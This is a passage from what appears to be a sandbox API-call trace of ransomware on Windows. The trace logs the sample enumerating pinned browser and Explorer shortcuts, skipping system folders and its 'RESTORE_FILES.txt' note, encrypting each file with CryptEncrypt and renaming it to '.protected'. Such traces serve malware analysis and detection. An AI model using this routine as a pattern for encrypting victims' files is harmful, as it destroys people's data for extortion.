lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e2d4*=0x30, lpOverlapped=0x0) returned 1 [0090.013] CloseHandle (hObject=0x158) returned 1 [0090.013] wnsprintfW (in: pszDest=0x513c88, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Google Chrome.lnk.protected") returned 138 [0090.013] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Google Chrome.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\user pinned\\taskbar\\google chrome.lnk"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Google Chrome.lnk.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\user pinned\\taskbar\\google chrome.lnk.protected")) returned 1 [0090.015] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 1 [0090.015] lstrcmpiW (lpString1="Internet Explorer (2).lnk", lpString2="Windows") returned -1 [0090.015] lstrcmpiW (lpString1="Internet Explorer (2).lnk", lpString2="Program Files") returned -1 [0090.015] lstrcmpiW (lpString1="Internet Explorer (2).lnk", lpString2="Program Files (x86)") returned -1 [0090.015] lstrcmpiW (lpString1="Internet Explorer (2).lnk", lpString2="$Recycle.bin") returned 1 [0090.015] lstrcmpiW (lpString1="Internet Explorer (2).lnk", lpString2="System Volume Information") returned -1 [0090.015] wnsprintfW (in: pszDest=0x503c40, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Internet Explorer (2).lnk") returned 136 [0090.015] StrStrIW (lpFirst="Internet Explorer (2).lnk", lpSrch=".protected") returned 0x0 [0090.015] lstrcmpW (lpString1="Internet Explorer (2).lnk", lpString2="RESTORE_FILES.txt") returned -1 [0090.015] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e28c | out: pbBuffer=0x295e28c) returned 1 [0090.015] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x30) returned 1 [0090.015] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Internet Explorer (2).lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\user pinned\\taskbar\\internet explorer (2).lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0090.016] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Internet Explorer (2).lnk") returned 136 [0090.016] StrStrW (lpFirst="Internet Explorer (2).lnk", lpSrch=".txt") returned 0x0 [0090.016] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Internet Explorer (2).lnk") returned 136 [0090.016] StrStrW (lpFirst="Internet Explorer (2).lnk", lpSrch=".rar") returned 0x0 [0090.016] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Internet Explorer (2).lnk") returned 136 [0090.016] StrStrW (lpFirst="Internet Explorer (2).lnk", lpSrch=".zip") returned 0x0 [0090.016] ReadFile (in: hFile=0x158, lpBuffer=0x513c88, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x513c88*, lpNumberOfBytesRead=0x295e2d4*=0x5ad, lpOverlapped=0x0) returned 1 [0090.016] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xfffffa53, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0090.016] WriteFile (in: hFile=0x158, lpBuffer=0x513c88*, nNumberOfBytesToWrite=0x5ad, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x513c88*, lpNumberOfBytesWritten=0x295e2d4*=0x5ad, lpOverlapped=0x0) returned 1 [0090.017] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0090.017] WriteFile (in: hFile=0x158, lpBuffer=0x295e2ac*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x295e2ac*, lpNumberOfBytesWritten=0x295e2d4*=0x4, lpOverlapped=0x0) returned 1 [0090.017] WriteFile (in: hFile=0x158, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e2d4*=0x30, lpOverlapped=0x0) returned 1 [0090.017] CloseHandle (hObject=0x158) returned 1 [0090.017] wnsprintfW (in: pszDest=0x513c88, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Internet Explorer (2).lnk.protected") returned 146 [0090.017] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Internet Explorer (2).lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\user pinned\\taskbar\\internet explorer (2).lnk"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Internet Explorer (2).lnk.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\user pinned\\taskbar\\internet explorer (2).lnk.protected")) returned 1 [0090.019] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 1 [0090.019] lstrcmpiW (lpString1="Internet Explorer.lnk", lpString2="Windows") returned -1 [0090.019] lstrcmpiW (lpString1="Internet Explorer.lnk", lpString2="Program Files") returned -1 [0090.019] lstrcmpiW (lpString1="Internet Explorer.lnk", lpString2="Program Files (x86)") returned -1 [0090.019] lstrcmpiW (lpString1="Internet Explorer.lnk", lpString2="$Recycle.bin") returned 1 [0090.019] lstrcmpiW (lpString1="Internet Explorer.lnk", lpString2="System Volume Information") returned -1 [0090.019] wnsprintfW (in: pszDest=0x503c40, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Internet Explorer.lnk") returned 132 [0090.019] StrStrIW (lpFirst="Internet Explorer.lnk", lpSrch=".protected") returned 0x0 [0090.019] lstrcmpW (lpString1="Internet Explorer.lnk", lpString2="RESTORE_FILES.txt") returned -1 [0090.019] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e28c | out: pbBuffer=0x295e28c) returned 1 [0090.019] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x30) returned 1 [0090.019] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Internet Explorer.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\user pinned\\taskbar\\internet explorer.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0090.020] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Internet Explorer.lnk") returned 132 [0090.020] StrStrW (lpFirst="Internet Explorer.lnk", lpSrch=".txt") returned 0x0 [0090.020] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Internet Explorer.lnk") returned 132 [0090.020] StrStrW (lpFirst="Internet Explorer.lnk", lpSrch=".rar") returned 0x0 [0090.020] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Internet Explorer.lnk") returned 132 [0090.020] StrStrW (lpFirst="Internet Explorer.lnk", lpSrch=".zip") returned 0x0 [0090.020] ReadFile (in: hFile=0x158, lpBuffer=0x513c88, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x513c88*, lpNumberOfBytesRead=0x295e2d4*=0x5a9, lpOverlapped=0x0) returned 1 [0090.055] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xfffffa57, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0090.055] WriteFile (in: hFile=0x158, lpBuffer=0x513c88*, nNumberOfBytesToWrite=0x5a9, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x513c88*, lpNumberOfBytesWritten=0x295e2d4*=0x5a9, lpOverlapped=0x0) returned 1 [0090.055] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0090.055] WriteFile (in: hFile=0x158, lpBuffer=0x295e2ac*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x295e2ac*, lpNumberOfBytesWritten=0x295e2d4*=0x4, lpOverlapped=0x0) returned 1 [0090.055] WriteFile (in: hFile=0x158, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e2d4*=0x30, lpOverlapped=0x0) returned 1 [0090.055] CloseHandle (hObject=0x158) returned 1 [0090.056] wnsprintfW (in: pszDest=0x513c88, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Internet Explorer.lnk.protected") returned 142 [0090.056] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Internet Explorer.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\user pinned\\taskbar\\internet explorer.lnk"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Internet Explorer.lnk.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\user pinned\\taskbar\\internet explorer.lnk.protected")) returned 1 [0090.057] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 1 [0090.057] lstrcmpiW (lpString1="Mozilla Firefox.lnk", lpString2="Windows") returned -1 [0090.057] lstrcmpiW (lpString1="Mozilla Firefox.lnk", lpString2="Program Files") returned -1 [0090.057] lstrcmpiW (lpString1="Mozilla Firefox.lnk", lpString2="Program Files (x86)") returned -1 [0090.057] lstrcmpiW (lpString1="Mozilla Firefox.lnk", lpString2="$Recycle.bin") returned 1 [0090.057] lstrcmpiW (lpString1="Mozilla Firefox.lnk", lpString2="System Volume Information") returned -1 [0090.057] wnsprintfW (in: pszDest=0x503c40, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Mozilla Firefox.lnk") returned 130 [0090.057] StrStrIW (lpFirst="Mozilla Firefox.lnk", lpSrch=".protected") returned 0x0 [0090.057] lstrcmpW (lpString1="Mozilla Firefox.lnk", lpString2="RESTORE_FILES.txt") returned -1 [0090.057] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e28c | out: pbBuffer=0x295e28c) returned 1 [0090.057] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x30) returned 1 [0090.057] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Mozilla Firefox.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\user pinned\\taskbar\\mozilla firefox.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0090.058] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Mozilla Firefox.lnk") returned 130 [0090.058] StrStrW (lpFirst="Mozilla Firefox.lnk", lpSrch=".txt") returned 0x0 [0090.058] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Mozilla Firefox.lnk") returned 130 [0090.058] StrStrW (lpFirst="Mozilla Firefox.lnk", lpSrch=".rar") returned 0x0 [0090.058] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Mozilla Firefox.lnk") returned 130 [0090.058] StrStrW (lpFirst="Mozilla Firefox.lnk", lpSrch=".zip") returned 0x0 [0090.058] ReadFile (in: hFile=0x158, lpBuffer=0x513c88, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x513c88*, lpNumberOfBytesRead=0x295e2d4*=0x491, lpOverlapped=0x0) returned 1 [0090.058] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xfffffb6f, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0090.058] WriteFile (in: hFile=0x158, lpBuffer=0x513c88*, nNumberOfBytesToWrite=0x491, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x513c88*, lpNumberOfBytesWritten=0x295e2d4*=0x491, lpOverlapped=0x0) returned 1 [0090.058] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0090.058] WriteFile (in: hFile=0x158, lpBuffer=0x295e2ac*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x295e2ac*, lpNumberOfBytesWritten=0x295e2d4*=0x4, lpOverlapped=0x0) returned 1 [0090.058] WriteFile (in: hFile=0x158, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e2d4*=0x30, lpOverlapped=0x0) returned 1 [0090.059] CloseHandle (hObject=0x158) returned 1 [0090.059] wnsprintfW (in: pszDest=0x513c88, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Mozilla Firefox.lnk.protected") returned 140 [0090.059] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Mozilla Firefox.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\user pinned\\taskbar\\mozilla firefox.lnk"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Mozilla Firefox.lnk.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\user pinned\\taskbar\\mozilla firefox.lnk.protected")) returned 1 [0090.060] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 1 [0090.060] lstrcmpiW (lpString1="Windows Explorer (2).lnk", lpString2="Windows") returned 1 [0090.060] lstrcmpiW (lpString1="Windows Explorer (2).lnk", lpString2="Program Files") returned 1 [0090.060] lstrcmpiW (lpString1="Windows Explorer (2).lnk", lpString2="Program Files (x86)") returned 1 [0090.060] lstrcmpiW (lpString1="Windows Explorer (2).lnk", lpString2="$Recycle.bin") returned 1 [0090.060] lstrcmpiW (lpString1="Windows Explorer (2).lnk", lpString2="System Volume Information") returned 1 [0090.060] wnsprintfW (in: pszDest=0x503c40, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Windows Explorer (2).lnk") returned 135 [0090.060] StrStrIW (lpFirst="Windows Explorer (2).lnk", lpSrch=".protected") returned 0x0 [0090.060] lstrcmpW (lpString1="Windows Explorer (2).lnk", lpString2="RESTORE_FILES.txt") returned 1 [0090.060] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e28c | out: pbBuffer=0x295e28c) returned 1 [0090.060] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x30) returned 1 [0090.060] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Windows Explorer (2).lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\user pinned\\taskbar\\windows explorer (2).lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0090.060] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Windows Explorer (2).lnk") returned 135 [0090.060] StrStrW (lpFirst="Windows Explorer (2).lnk", lpSrch=".txt") returned 0x0 [0090.060] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Windows Explorer (2).lnk") returned 135 [0090.060] StrStrW (lpFirst="Windows Explorer (2).lnk", lpSrch=".rar") returned 0x0 [0090.060] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Windows Explorer (2).lnk") returned 135 [0090.060] StrStrW (lpFirst="Windows Explorer (2).lnk", lpSrch=".zip") returned 0x0 [0090.060] ReadFile (in: hFile=0x158, lpBuffer=0x513c88, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x513c88*, lpNumberOfBytesRead=0x295e2d4*=0x4cc, lpOverlapped=0x0) returned 1 [0090.061] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xfffffb34, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0090.061] WriteFile (in: hFile=0x158, lpBuffer=0x513c88*, nNumberOfBytesToWrite=0x4cc, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x513c88*, lpNumberOfBytesWritten=0x295e2d4*=0x4cc, lpOverlapped=0x0) returned 1 [0090.061] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0090.061] WriteFile (in: hFile=0x158, lpBuffer=0x295e2ac*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x295e2ac*, lpNumberOfBytesWritten=0x295e2d4*=0x4, lpOverlapped=0x0) returned 1 [0090.061] WriteFile (in: hFile=0x158, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e2d4*=0x30, lpOverlapped=0x0) returned 1 [0090.061] CloseHandle (hObject=0x158) returned 1 [0090.061] wnsprintfW (in: pszDest=0x513c88, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Windows Explorer (2).lnk.protected") returned 145 [0090.061] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Windows Explorer (2).lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\user pinned\\taskbar\\windows explorer (2).lnk"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Windows Explorer (2).lnk.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\user pinned\\taskbar\\windows explorer (2).lnk.protected")) returned 1 [0090.062] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 1 [0090.062] lstrcmpiW (lpString1="Windows Explorer.lnk", lpString2="Windows") returned 1 [0090.062] lstrcmpiW (lpString1="Windows Explorer.lnk", lpString2="Program Files") returned 1 [0090.062] lstrcmpiW (lpString1="Windows Explorer.lnk", lpString2="Program Files (x86)") returned 1 [0090.062] lstrcmpiW (lpString1="Windows Explorer.lnk", lpString2="$Recycle.bin") returned 1 [0090.062] lstrcmpiW (lpString1="Windows Explorer.lnk", lpString2="System Volume Information") returned 1 [0090.062] wnsprintfW (in: pszDest=0x503c40, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Windows Explorer.lnk") returned 131 [0090.062] StrStrIW (lpFirst="Windows Explorer.lnk", lpSrch=".protected") returned 0x0 [0090.062] lstrcmpW (lpString1="Windows Explorer.lnk", lpString2="RESTORE_FILES.txt") returned 1 [0090.062] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e28c | out: pbBuffer=0x295e28c) returned 1 [0090.062] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x30) returned 1 [0090.062] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Windows Explorer.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\user pinned\\taskbar\\windows explorer.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0090.063] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Windows Explorer.lnk") returned 131 [0090.063] StrStrW (lpFirst="Windows Explorer.lnk", lpSrch=".txt") returned 0x0 [0090.063] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Windows Explorer.lnk") returned 131 [0090.063] StrStrW (lpFirst="Windows Explorer.lnk", lpSrch=".rar") returned 0x0 [0090.063] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Windows Explorer.lnk") returned 131 [0090.063] StrStrW (lpFirst="Windows Explorer.lnk", lpSrch=".zip") returned 0x0 [0090.063] ReadFile (in: hFile=0x158, lpBuffer=0x513c88, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x513c88*, lpNumberOfBytesRead=0x295e2d4*=0x4cc, lpOverlapped=0x0) returned 1 [0090.065] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xfffffb34, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0090.065] WriteFile (in: hFile=0x158, lpBuffer=0x513c88*, nNumberOfBytesToWrite=0x4cc, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x513c88*, lpNumberOfBytesWritten=0x295e2d4*=0x4cc, lpOverlapped=0x0) returned 1 [0090.065] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0090.065] WriteFile (in: hFile=0x158, lpBuffer=0x295e2ac*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x295e2ac*, lpNumberOfBytesWritten=0x295e2d4*=0x4, lpOverlapped=0x0) returned 1 [0090.065] WriteFile (in: hFile=0x158, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e2d4*=0x30, lpOverlapped=0x0) returned 1 [0090.065] CloseHandle (hObject=0x158) returned 1 [0090.065] wnsprintfW (in: pszDest=0x513c88, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS 